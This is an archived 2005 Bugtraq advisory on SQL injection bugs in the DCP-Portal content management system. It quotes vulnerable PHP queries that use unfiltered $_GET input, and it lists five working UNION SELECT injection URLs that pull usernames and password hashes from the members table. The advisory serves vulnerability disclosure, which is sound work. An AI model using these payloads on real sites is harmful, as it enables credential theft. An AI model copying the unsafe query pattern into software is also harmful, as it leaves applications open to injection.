lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 16 Feb 2005 07:13:57 -0000
From: Exoduks <exoduks@...il.com>
To: bugtraq@...urityfocus.com
Subject: [hackgen-2005-#003] - SQL injection bugs in DCP-Portal




http://www.hackgen.org/advisories/hackgen-2005-003.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                          [hackgen-2005-#003]                       '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                    SQL injection bugs in DCP-Portal                '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  
  Software: DCP-Portal <= 6.1.1
  Homepage: http://www.dcp-portal.org
  Author: "Exoduks" - HackGen Team
  Release Date: 16 March, 2005
  Website: www.hackgen.org
  Mail: exoduks [at] gmail . com
  
 

 0x01 - Affected software description:
 -------------------------------------
 DCP-Portal is a content management system with advanced features like web 
 based update, link, file, member management, poll, calendar, content informer, 
 content sending by members etc. Features: Admin panel to manage the entire site; 
 HTML editor to add news and content; Members can submit news and contents, and 
 write reviews; Members can receive the added content in e-mail; Mailing list; 
 Search engine; Content categories; FAQ; Easy setup; Multi-language support; Forum; 
 Message system; member agenda; Ad management. Site design can be changed with just 
 one template file, publish in homepage option, .txt file import for contents, 
 featured module, works with register_globals=off..                    



 0x02 - Vulnerability Discription:
 ---------------------------------
 Vulnerabilities exist in prety much all sql queries, some of them are in index.php
 and forums.php. There isn't eny filtering for input string in all $_GET and $_POST
 variables. So it is possible to input evil sql query that will give us for example 
 hashed password of user we want. This bug is very critical because we can get and 
 admin password. So some evil user deface portal, or delate all database. This can 
 be exploited if magic_quotes_gpc is set to Off in php.ini 


 0x03 - Vulnerability Code:
 --------------------------
 Vulnerability code in index.php

 ----- beging the code in index.php -----
  ....
  $result = mysql_query("SELECT * FROM  $t_members WHERE uid = '".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username");
  ....
  $sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
  ....
  $sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
  ....
  $result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = '".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC");
  ....
 ----- end of the code -----

Vulnerability code in forums.php

 ----- beging the code in forums.php -----
  ....
  $result = mysql_query("SELECT * FROM $t_forums WHERE fid = '".$_GET["bid"]."'");
  ....
  $result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = '".$_GET["mid"]."'");
  ....
 ----- end of the code -----



 0x04 - How to fix this bug:
 ---------------------------
 Vendor has beed contacted and he we probably publish new version of portal so go to 
 http://www.dcp-portal.org and look for new version.



 0x05 - Exploit:
 ----------------

 http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM 
 dcp5_members WHERE username=%27[username]

 http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password,
 null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]

 http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null,
 null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members 
 WHERE username=%27[username]

 http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,
 username,null,null,null FROM dcp5_members WHERE username=%27[username]

 http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM 
 dcp5_members WHERE username=%27[username]

 Replace [username] with username which you want to get password for and if you need change 
 dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works !

 0x006 - The End:
 ----------------
 And you have come to end. My threed advisor is out. 
 Grejtttzz to: All people who are working on phearless zine which can be readed on
 http://phearless.headcoders.net 



                         ______________________________________
                          Written By Exoduks - www.hackgen.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ